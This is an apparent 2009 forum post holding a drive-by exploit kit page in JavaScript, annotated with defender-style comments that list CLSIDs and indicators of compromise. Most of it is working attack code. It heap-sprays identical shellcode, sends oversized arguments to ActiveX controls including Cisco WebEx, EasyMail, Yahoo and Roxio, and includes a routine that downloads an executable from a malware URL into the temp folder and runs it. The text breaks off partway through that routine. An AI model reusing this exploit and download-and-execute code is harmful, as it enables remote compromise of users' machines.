Author Topic: Exploit targeting Cisco WebEx, EasyMail etc...  (Read 8766 times)


June 05, 2009, 03:53:38 pm

JohnC

// Drive-by exploit page as posted. Each function below targets one ActiveX
// control (selected by CLSID or ProgID), fills the heap with many copies of a
// filler string plus one identical shellcode blob, and then feeds an oversized
// argument to a method or property of that control. Every attempt is wrapped
// in try{...}catch(e){} so an absent control fails silently.
// Defender notes: the CLSIDs/ProgIDs named here are the blocking (kill-bit)
// candidates. Decoding the %u blobs shows that all variants share the same
// bytes and differ only in the trailing "&spl=NN" of the embedded URL
// http://Usrv04.ru/infect.php?id=2690 (also held in `url` further down), so
// the spl value in a proxy log identifies which branch fired.
function crstr(str,l){
// Repeat `str` by self-concatenation until it has at least `l` UTF-16 units,
// then cut it to exactly `l`.
var instr = str;

do { instr += instr; } while(instr.length < l);

return instr.substr(0,l);

}function AOL(){
// CLSID FE0BD779-44EE-4A4B-AA2E-743C63F2E5E6. Sprays 666 blocks of 0x0c0c
// filler + shellcode (each grown until block+slackspace reaches 0x40000
// units), then calls ConvertFile() four times with a 2400-char argument
// (1400 x 0xff followed by 1000 x 0x0c). `shellcode`, `bigblock`,
// `headersize`, `slackspace`, `fillblock`, `block`, `memory`, `i` and `bof`
// are assigned without `var` (implicit globals).
try{

var aolobj = document.createElement('object');

aolobj.setAttribute('classid', 'clsid:FE0BD779-44EE-4A4B-AA2E-743C63F2E5E6');

aolobj.setAttribute("id", "aolobj");



// Same blob in every variant below; only the final %u group (the spl value
// at the end of the embedded URL) differs.
shellcode = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u552F%u7273%u3076%u2E34%u7572%u692F%u666E%u6365%u2E74%u6870%u3F70%u6469%u323D%u3936%u3F30%u6469%u323D%u3936%u2630%u7073%u3D6C%u3731");

   

bigblock   = unescape("%u0c0c%u0c0c");

headersize = 20;

slackspace = headersize+shellcode.length;

while (bigblock.length<slackspace) bigblock+=bigblock;

fillblock = bigblock.substring(0, slackspace);

block = bigblock.substring(0, bigblock.length-slackspace);

while(block.length+slackspace<0x40000) block = block+block+fillblock;

memory = new Array();

for (i=0;i<666;i++){memory[i] = block+shellcode}

bof=crstr(unescape("%ff"), 1400) + crstr(unescape("%0c"), 1000);

aolobj.ConvertFile(bof,1,1,1,1,1);

aolobj.ConvertFile(bof,1,1,1,1,1);

aolobj.ConvertFile(bof,1,1,1,1,1);

aolobj.ConvertFile(bof,1,1,1,1,1);

} catch(e) {}

}function cgagent(){
// CLSID 75108B29-202F-493C-86C5-1C182A485C4C. Sprays 300 blocks of 0x9090
// filler + shellcode, then calls CreateChinagames() with a 796-unit string
// of 0x0c0c. `fillblock`, `block`, `memory` and `x` are implicit globals.
try{

var cgagent = document.createElement('object');

cgagent.setAttribute('classid', 'clsid:75108B29-202F-493C-86C5-1C182A485C4C');

cgagent.setAttribute("id", "cgagent");



var shellcode = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u552F%u7273%u3076%u2E34%u7572%u692F%u666E%u6365%u2E74%u6870%u3F70%u6469%u323D%u3936%u3F30%u6469%u323D%u3936%u2630%u7073%u3D6C%u3831");

var bigblock = unescape("%u9090%u9090");

var headersize = 20;

var slackspace = headersize+shellcode.length;

while (bigblock.length<slackspace)

bigblock+=bigblock;



fillblock = bigblock.substring(0, slackspace);

block = bigblock.substring(0, bigblock.length-slackspace);

while(block.length+slackspace<0x40000)

block = block+block+fillblock;



memory = new Array();

for (x=0; x<300; x++)

memory[x] = block + shellcode;

var buffer = '';

while (buffer.length < 796 )

buffer+=unescape("%u0c0c");

cgagent.CreateChinagames(buffer);

} catch(e) {}

}function CiscoWebex(){
// CLSID 32E26FD9-F435-4A20-A561-35D4B987CFDC. Grows a 0x0909 filler to at
// least 0x25000 units, appends filler + shellcode to 1000 array slots, then
// calls NewObject() with a string of 151 'X' plus four 0x09 bytes.
try{

var CiscoWebex = document.createElement('object');

CiscoWebex.setAttribute('classid', 'clsid:32E26FD9-F435-4A20-A561-35D4B987CFDC');

CiscoWebex.setAttribute("id", "CiscoWebex");

var shellcode = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u552F%u7273%u3076%u2E34%u7572%u692F%u666E%u6365%u2E74%u6870%u3F70%u6469%u323D%u3936%u3F30%u6469%u323D%u3936%u2630%u7073%u3D6C%u3931");



var block = unescape("%u0909%u0909");

while (block.length < 0x25000) block += block;



var memory = new Array();



var i=0;

for (;i<1000;i++) memory[i] += block + shellcode;



memory[i] += shellcode;



var buf2;

for (var i=0; i<151; i++) buf2 += "X";



buf2 += unescape("%09%09%09%09");



CiscoWebex.NewObject(buf2);

} catch(e) {}

}function EasyMail(){
// CLSID 5B8BE023-76A2-4F6D-8993-F7E588D79D98. Spray parameters: target
// 0x0c0c0c0c, 0x400000-byte blocks, (heapSA+heapBS)/heapBS of them, each a
// 0x9090 slide sized to the block minus payload minus 5 bytes, plus the
// shellcode. Then CreateStore() is called with a 3000-char 0x0c string.
// `i` is an implicit global.

// Local copy of gss() defined later in the page: grow `sSlide` until
// doubling it again would reach `sSlideSize` bytes, then cut to half that
// many UTF-16 units.
function getsSlide(sSlide, sSlideSize) {

while (sSlide.length*2<sSlideSize) {

sSlide += sSlide;

}

sSlide = sSlide.substring(0,sSlideSize/2);

return (sSlide);

}

try{

var EasyMail = document.createElement('object');

EasyMail.setAttribute('classid', 'clsid:5B8BE023-76A2-4F6D-8993-F7E588D79D98');

EasyMail.setAttribute("id", "EasyMail");

var sCode  = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u552F%u7273%u3076%u2E34%u7572%u692F%u666E%u6365%u2E74%u6870%u3F70%u6469%u323D%u3936%u3F30%u6469%u323D%u3936%u2630%u7073%u3D6C%u3032");

var sSlide = unescape("%u9090%u9090");

var heapSA = 0x0c0c0c0c;



var heapBS  = 0x400000;

var sizeHDM = 0x5;

var PLSize  = (sCode.length * 2);

var sSlideSize = heapBS - (PLSize + sizeHDM);

var heapBlocks = (heapSA+heapBS)/heapBS;

var memory = new Array();



sSlide = getsSlide(sSlide,sSlideSize);



for (i=0;i<heapBlocks;i++) {

memory[i] = sSlide + sCode;

}

var buffSize = 3000;

var x = unescape("%0c%0c%0c%0c");



while (x.length<buffSize) x += x;



x = x.substring(0,buffSize);



EasyMail.CreateStore(x, 1);

} catch(e) {}

}function MPS(){
// CLSID 6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB. Sprays 300 blocks of 0x9090
// filler + shellcode, then calls OnBeforeVideoDownload() with a string of
// \x0c grown past 4150 chars. `fillblock`, `block`, `memory` and `x` are
// implicit globals.
try{

var MPS = document.createElement('object');

MPS.setAttribute('classid', 'clsid:6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB');

MPS.setAttribute("id", "MPS");

   var shellcode = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u552F%u7273%u3076%u2E34%u7572%u692F%u666E%u6365%u2E74%u6870%u3F70%u6469%u323D%u3936%u3F30%u6469%u323D%u3936%u2630%u7073%u3D6C%u3132");

   var bigblock = unescape("%u9090%u9090");

   var headersize = 20;

   var slackspace = headersize+shellcode.length;

   while (bigblock.length<slackspace)

       bigblock+=bigblock;

   

   fillblock = bigblock.substring(0, slackspace);

   block = bigblock.substring(0, bigblock.length-slackspace);

   while(block.length+slackspace<0x40000)

       block = block+block+fillblock;

   

   memory = new Array();

   for (x=0; x<300; x++)

       memory[x] = block + shellcode;

   var buffer = '';

   while (buffer.length < 4150)

       buffer+="\x0c\x0c\x0c\x0c";

   MPS.OnBeforeVideoDownload(buffer);

} catch(e) {}

}function Roxio(){
// CLSID EE1BBA18-F0C8-477E-8AC8-C28B94F1B7DC. Sprays 500 blocks of 0x9090
// filler + shellcode (block limit 262000 units here), then calls
// SetIAPlayerName() with 'A' followed by 201 x 4 bytes of 0x0c. Every
// variable in this function is an implicit global (no `var`).
try{

var Roxio = document.createElement('object');

Roxio.setAttribute('classid', 'clsid:EE1BBA18-F0C8-477E-8AC8-C28B94F1B7DC');

Roxio.setAttribute("id", "Roxio");



shellcode = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u552F%u7273%u3076%u2E34%u7572%u692F%u666E%u6365%u2E74%u6870%u3F70%u6469%u323D%u3936%u3F30%u6469%u323D%u3936%u2630%u7073%u3D6C%u3232");

nops      = unescape('%u9090%u9090');



headersize = 20;

slackspace = headersize + shellcode.length;



while(nops.length < slackspace) nops += nops;

fillblock = nops.substring(0, slackspace);

block     = nops.substring(0, nops.length - slackspace);



while(block.length + slackspace < 262000) block = block + block + fillblock;



memory=new Array();



for(counter=0; counter<500; counter++) memory[counter] = block + shellcode;



buffer = 'A';



for(counter=0; counter<=200; counter++) buffer +=unescape('%0c%0c%0c%0c');



Roxio.SetIAPlayerName(buffer);

} catch(e) {}

}function Yahoo(){
// CLSID 9D39223E-AE8E-11D4-8FD3-00D0B7730277. Sprays 500 blocks of 0x9090
// filler + shellcode, assigns a \x0a string grown past 5000 chars to the
// control's `server` property and then calls receive(). `bigblock`,
// `headersize`, `slackspace`, `fillblock`, `block`, `memory` and `x` are
// implicit globals.
try{

var Yahoo = document.createElement('object');

Yahoo.setAttribute('classid', 'clsid:9D39223E-AE8E-11D4-8FD3-00D0B7730277');

Yahoo.setAttribute("id", "Yahoo");



var shellcode = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u552F%u7273%u3076%u2E34%u7572%u692F%u666E%u6365%u2E74%u6870%u3F70%u6469%u323D%u3936%u3F30%u6469%u323D%u3936%u2630%u7073%u3D6C%u3332");



bigblock = unescape("%u9090%u9090");



headersize = 20;

slackspace = headersize+shellcode.length;



while (bigblock.length<slackspace) bigblock+=bigblock;



fillblock = bigblock.substring(0, slackspace);

block     = bigblock.substring(0, bigblock.length-slackspace);



while(block.length+slackspace<0x40000) block = block+block+fillblock;



memory = new Array();



for (x=0; x<500; x++) memory[x] = block + shellcode;



var buffer = '\x0a';



while (buffer.length < 5000) buffer+='\x0a\x0a\x0a\x0a';



Yahoo.server = buffer;

Yahoo.receive();

} catch(e) {}

}function LPViewer() {
// ProgID LPViewer.LPViewer.1 via ActiveXObject. Sprays 400 blocks of the
// %u4b27%uf943 filler + shellcode, then assigns 1224 x 4 bytes of 0x0c to
// the control's `URL` property. `i` is an implicit global.
try {

var LPViewer = new ActiveXObject('LPViewer.LPViewer.1');

var shellcode = unescape('%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u552F%u7273%u3076%u2E34%u7572%u692F%u666E%u6365%u2E74%u6870%u3F70%u6469%u323D%u3936%u3F30%u6469%u323D%u3936%u2630%u7073%u3D6C%u3432');

var bigblock = unescape('%u4b27%uf943');



var headersize  = 20;

var slackspace = headersize + shellcode.length;



while(bigblock.length < slackspace) bigblock += bigblock;



var fillblock = bigblock.substring(0,slackspace);

var block     = bigblock.substring(0,bigblock.length - slackspace);



while (block.length + slackspace < 0x40000) block = block + block + fillblock;



var memory = new Array();



for (i=0; i<400; i++){ memory[i] = block + shellcode }



var buffer = "";



for (i=0; i<1224; i++) { buffer = buffer + unescape('%0c%0c%0c%0c'); }



LPViewer.URL = buffer;

}

catch(e) { }

}function Macrovision(){
// CLSID E9880553-B8A7-4960-A668-95C68BED571E. No spray here: it invokes the
// control's own Initialize / DownloadAndExecute / DownloadAndInstall methods
// with the infect.php URL (&spl=4), i.e. it relies on the control doing the
// download and execution itself.
try{

var Yahoo = document.createElement('object');

Macrovision.setAttribute('classid', 'clsid:E9880553-B8A7-4960-A668-95C68BED571E');

Macrovision.setAttribute("id", "Macrovision");

Macrovision.Initialize("Macrovision","Macrovision","","");

Macrovision.DownloadAndExecute("","",1,"http://Usrv04.ru/infect.php?id=2690&spl=4","");

Macrovision.DownloadAndInstall("True");

} catch(e) {}

}function RunACX(delay){
// Schedules the nine ActiveX attempts above through string-argument
// setTimeout (an implicit eval), one per second from delay+1 to delay+9
// seconds. The bottom of the page calls RunACX(10).
setTimeout("AOL()", 1000 * (delay + 1));

setTimeout("cgagent()", 1000 * (delay + 2));

setTimeout("CiscoWebex()", 1000 * (delay + 3));

setTimeout("EasyMail()", 1000 * (delay + 4));

setTimeout("MPS()", 1000 * (delay + 5));

setTimeout("Roxio()", 1000 * (delay + 6));

setTimeout("Yahoo()", 1000 * (delay + 7));

setTimeout("LPViewer()", 1000 * (delay + 8));

setTimeout("Macrovision()", 1000 * (delay + 9));

} function cobj(obj){
// Instantiate a control from either a "{CLSID}" string (via an <object>
// element with classid=) or a ProgID (via ActiveXObject). Returns the
// object, or null when creation throws.
var ret=null;

if(obj.substring(0,1)=="{"){

try{

var clsid=obj.substring(1,obj.length-1);

ret=document.createElement("object");

ret.setAttribute("classid","clsid:"+clsid);

return ret;

}catch(e){

return null;

}

}else{

try{

ret=new ActiveXObject(obj);

return ret;

}catch(e){

return null;

}

}

} function sleep(func,naptime){
// Busy-wait: spins on Date until `naptime` ms have elapsed (a tight loop, so
// the page is unresponsive meanwhile), then eval()s the string `func`.
// attack() uses this as its stage scheduler ("attack(N);").
// `alarmMSeconds` is an implicit global.
var sleeping = true;

var now = new Date();

var alarm;

var startingMSeconds = now.getTime();

while(sleeping){

alarm = new Date();

alarmMSeconds = alarm.getTime();

if (alarmMSeconds - startingMSeconds > naptime){ sleeping = false; }

}

eval(func);

}



// Shared state for the ms()/attack() chain below.
var m=new Array();   // spray slots filled (and re-filled) by ms()

var mf=0;            // set to 1 once ms() has sprayed; later calls clear m[] first

// Payload/statistics URL (network IoC). ms() and Go() append "&spl=N" so the
// request reveals which exploit branch fired.
var url="http://Usrv04.ru/infect.php?id=2690";



function hex(num,width){
// Render `num` as upper-case hexadecimal without a prefix, left-padded with
// '0' to at least `width` digits (no padding when width is omitted or 0).
// Nibbles are peeled off with an unsigned shift; a value that is not > 0xF
// (including negatives, NaN and undefined) yields its low nibble only.
var table="0123456789ABCDEF";

var rest=num;

var out="";

for(;;){

out=table.charAt(rest&0xF)+out;

if(!(rest>0xF))break;

rest=rest>>>4;

}

var minLen=width?width:0;

for(;out.length<minLen;)out="0"+out;

return out;

}



// Encode a 32-bit value as two UTF-16 units, low 16 bits first (i.e. the
// little-endian DWORD as it would sit in memory). The parameter shadows the
// function name inside the body; hex() is defined above.
function addr(addr){

return unescape("%u"+hex(addr&0xFFFF,4)+"%u"+hex((addr>>16)&0xFFFF,4));

}



// Pack a byte-per-char string into UTF-16 units: every 4 chars become one
// DWORD (char i is the low byte) rendered through addr(). ms() uses this on
// the \x-escaped shellcode plus the appended URL. A trailing partial group
// reads charCodeAt() past the end (NaN), which the shifts turn into 0.
function unes(str){

var tmp="";

for(var i=0;i<str.length;i+=4){

tmp+=addr((str.charCodeAt(i+3)<<24)+

(str.charCodeAt(i+2)<<16)+

(str.charCodeAt(i+1)<<8)+

str.charCodeAt(i));

}

return unescape(tmp);

}



// Re-schedules itself every second via string setTimeout; the `mf=mf`
// assignment is a no-op. Started once by ms(). Presumably just keeps a
// timer alive while the spray is resident - verify against the host page.
function hav(){

mf=mf;

setTimeout("hav()",1000);

}



function gss(ss,sss){
// Grow `ss` by self-concatenation until doubling it once more would reach
// `sss`, then truncate to sss/2 UTF-16 units (`sss` is treated as a byte
// count, two bytes per unit). Same contract as getsSlide() inside EasyMail().
var grown=ss;

var keep=sss/2;

for(;grown.length*2<sss;){

grown=grown+grown;

}

return grown.substring(0,keep);

}



// Spray used by the attack() stages. `plc` is the same shellcode as the %u
// blobs above, given here as \x escapes, with url+xpl appended in cleartext
// so the resulting request identifies the stage. Parameters: target address
// 0x0c0c0c0c, 0x100000-byte blocks, (hsta-hbs)/hbs of them, each an
// addr(0x0c0c0c0c) slide (gss) followed by the shellcode. On a re-spray
// (mf already set) the previous m[] entries are deleted and IE's
// CollectGarbage() is forced first. Starts hav() the first time.
// `i` is an implicit global.
function ms(xpl){

var plc=unes("\x33\xC0\x64\x8B\x40\x30\x78\x0C\x8B\x40\x0C\x8B\x70\x1C\xAD\x8B\x58\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C\x8B\x58\x3C\x6A\x44\x5A\xD1\xE2\x2B\xE2\x8B\xEC\xEB\x4F\x5A\x52\x83\xEA\x56\x89\x55\x04\x56\x57\x8B\x73\x3C\x8B\x74\x33\x78\x03\xF3\x56\x8B\x76\x20\x03\xF3\x33\xC9\x49\x50\x41\xAD\x33\xFF\x36\x0F\xBE\x14\x03\x38\xF2\x74\x08\xC1\xCF\x0D\x03\xFA\x40\xEB\xEF\x58\x3B\xF8\x75\xE5\x5E\x8B\x46\x24\x03\xC3\x66\x8B\x0C\x48\x8B\x56\x1C\x03\xD3\x8B\x04\x8A\x03\xC3\x5F\x5E\x50\xC3\x8D\x7D\x08\x57\x52\xB8\x33\xCA\x8A\x5B\xE8\xA2\xFF\xFF\xFF\x32\xC0\x8B\xF7\xF2\xAE\x4F\xB8\x65\x2E\x65\x78\xAB\x66\x98\x66\xAB\xB0\x6C\x8A\xE0\x98\x50\x68\x6F\x6E\x2E\x64\x68\x75\x72\x6C\x6D\x54\xB8\x8E\x4E\x0E\xEC\xFF\x55\x04\x93\x50\x33\xC0\x50\x50\x56\x8B\x55\x04\x83\xC2\x7F\x83\xC2\x31\x52\x50\xB8\x36\x1A\x2F\x70\xFF\x55\x04\x5B\x33\xFF\x57\x56\xB8\x98\xFE\x8A\x0E\xFF\x55\x04\x57\xB8\xEF\xCE\xE0\x60\xFF\x55\x04"+url+xpl);

// sss is a byte count: block size minus payload bytes minus 0x38 of slack.
var hsta=0x0c0c0c0c,hbs=0x100000,pl=plc.length*2,sss=hbs-(pl+0x38);

var ss=gss(addr(hsta),sss),hb=(hsta-hbs)/hbs;

if (mf){

for (i=0;i<hb;i++)delete m[i];

CollectGarbage();

}

for(i=0;i<hb;i++)m[i]=ss+plc;

if(!mf){

mf=1;

hav();

}

return 0;

}



// State for the init/flush/alloc/alloc_str/free helpers used by attack(9).
var padding = "AAAA";        // grown by init() to a ~64 KiB string; sliced for fixed-size allocations

var heapBase = 0x00150000;   // base used to compute fakeObjPtr in attack(9)

var memo;                    // tag -> array of strings kept alive (set up in init())



// Grow `padding` until 4 + len*2 + 2 reaches 65535 (looks like a BSTR size
// computation: length prefix + UTF-16 data + terminator - verify), reset
// `memo`, then run flush(). `maxAlloc` is accepted but unused.
function init(maxAlloc){

while (4 + padding.length*2 + 2 < 65535)padding += padding;

memo = new Array();

flush();

}



// Allocator-grooming step (the "plunger" name and the 32/64/256/32768 size
// classes resemble the heapLib pattern - verify): drop the previous plunger
// array, force IE's CollectGarbage(), then allocate six rounds of strings
// sized to those buckets. The eval() only composes an ordinary assignment;
// it is not needed for the effect and is a useful scanner signature.
function flush(){

delete memo["plunger"];

CollectGarbage();

memo["plunger"] = new Array();

var bytes = new Array(32, 64, 256, 32768);

for (var i = 0; i < 6; i++) {

for(var n = 0; n < 4; n++) {

var len = memo["plunger"].length;

eval("memo[\"plunger\"][len] = padding.substr(0, (" + bytes[n] + "-6)/2);");

}

}

}



// Keep alive a padding slice of (arg-6)/2 UTF-16 units under `tag` (an
// undefined tag lands in memo["undefined"]). The `size` copy and the empty
// if() are dead code left in from the original helper.
function alloc(arg, tag){

var size;

size = arg;

if (size == 32 || size == 64 || size == 256 || size == 32768) {}

if ( ! memo[tag] )memo[tag] = new Array();

var len = memo[tag].length;

memo[tag][len] = padding.substr(0, (arg-6)/2);

}



// Keep alive a fresh copy of the string `arg` (substr forces a new string)
// under `tag`. As in alloc(), the `size` computation and empty if() are
// dead code.
function alloc_str(arg, tag){

var size;

size = 4 + arg.length*2 + 2;

if (size == 32 || size == 64 || size == 256 || size == 32768) {}

if ( ! memo[tag])memo[tag] = new Array();

var len = memo[tag].length;

memo[tag][len] = arg.substr(0, arg.length);

}



// Release everything held under `tag`, force IE's CollectGarbage(), then
// re-run the flush() grooming step.
function free(tag) {

delete memo[tag];

CollectGarbage();

flush();

}



// Try, in turn, the CreateObject()/GetObject() signatures a control might
// expose to script and return the first object obtained (null if none).
// Each failure is swallowed on purpose; attack(1) uses this to find
// controls that will hand script a Shell.Application instance.
function CreateO(o,n){

var r=null;

try{r=o.CreateObject(n)}catch(e){}

if(!r){try{r=o.CreateObject(n,"")}catch(e){}}

if(!r){try{r=o.CreateObject(n,"","")}catch(e){}}

if(!r){try{r=o.GetObject("",n)}catch(e){}}

if(!r){try{r=o.GetObject(n,"")}catch(e){}}

if(!r){try{r=o.GetObject(n)}catch(e){}}

return(r);

}



// Download-and-run through a scriptable control `a`: fetch url&spl=7 with
// whichever XMLHTTP flavour is available, write responseBody through
// ADODB.Stream (Mode 3 = read/write, Type 1 = binary - per the values used)
// into the special folder 2 (temp) as w32NOFJCyliz5mm5R.exe, then
// ShellExecute() it. The file name and URL are host/network IoCs.
// `rb` is an implicit global. Returns 1 on success, 0 if no HTTP object
// could be created.
function Go(a){

var eurl=url+"&spl=7";

var fname="w32NOFJCyliz5mm5R.exe";

var fso=a.CreateObject("Scripting.FileSystemObject","")

var sap=CreateO(a,"Shell.Application");

var x=CreateO(a,"ADODB.Stream");

var nl=null;

fname=fso.BuildPath(fso.GetSpecialFolder(2),fname);

x.Mode=3;

// The ProgID is split ("Micr"+"osoft.XMLH"+"TTP") to dodge naive string
// matching; the later fallbacks use the plain names.
try{nl=CreateO(a,"Micr"+"osoft.XMLH"+"TTP");nl.open("GET",eurl,false);}

